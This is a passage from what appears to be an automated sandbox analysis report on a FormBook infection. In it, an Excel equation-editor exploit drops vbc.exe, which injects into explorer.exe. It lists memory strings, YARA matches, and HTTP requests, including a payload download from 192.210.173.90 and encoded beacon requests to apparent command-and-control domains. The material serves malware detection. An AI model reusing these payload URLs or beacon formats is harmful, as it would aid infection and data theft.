6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: vbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.512027103.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
Source: vbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.487883890.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.467436694.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://java.sun.com
Source: vbc.exe, 00000004.00000002.466643244.0000000002E47000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.489358652.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000004.00000002.466643244.0000000002E47000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.489358652.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, vbc.exe, 00000004.00000002.464908482.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.456767218.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.461220666.0000000000409000.00000008.00020000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000002.464908482.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.456767218.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.461220666.0000000000409000.00000008.00020000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.465747026.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.480237988.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.490467352.0000000003E50000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: vbc.exe, 00000004.00000002.466643244.0000000002E47000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.489358652.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.512027103.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.512027103.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: vbc.exe, 00000004.00000002.466643244.0000000002E47000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.489358652.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.465747026.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.480237988.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.487883890.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.467436694.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.512027103.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: vbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000004.00000002.466643244.0000000002E47000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.489358652.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.512027103.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: vbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.510856156.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.484145859.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472911483.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472698287.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493785914.0000000008417000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.483993743.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.486816221.00000000083D7000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.510967068.0000000004513000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.510856156.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472698287.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493785914.0000000008417000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.483993743.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.486816221.00000000083D7000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.487883890.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.467436694.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000007.00000002.671238367.0000000002E22000.00000004.00020000.sdmpString found in binary or memory: https://www.clicktoreach.com/m07f/?8p=5jRPexjhYVA&8pM=igd9ZaB/0LuNZ3khfd1rv5ythTuTDfiv5fbgroetehOkX6
          Source: explorer.exe, 00000006.00000000.487883890.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.467436694.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.487883890.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.467436694.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7441E635.emfJump to behavior
          Source: unknownDNS traffic detected: queries for: www.promtgloan.com
          Source: global trafficHTTP traffic detected: GET /70007/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.173.90Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /m07f/?8p=5jRPexjhYVA&8pM=fckM7dU8XdB/CBRKAli8IWZTeVSsZcSnfT9NsehECm7QI2Avboj8F2o4ZiYCfg8g2yKAcw== HTTP/1.1Host: www.promtgloan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m07f/?8pM=dna2QeGax28GSJkNz7Uka6j7mpWTPT6ewM6loPSgIzIWFgZfz42ON2JlykoAty+SKeMdPQ==&8p=5jRPexjhYVA HTTP/1.1Host: www.yhxt13800.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m07f/?8p=5jRPexjhYVA&8pM=igd9ZaB/0LuNZ3khfd1rv5ythTuTDfiv5fbgroetehOkX6jie/kGfA2Y9msKDFCRQxq0nA== HTTP/1.1Host: www.clicktoreach.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
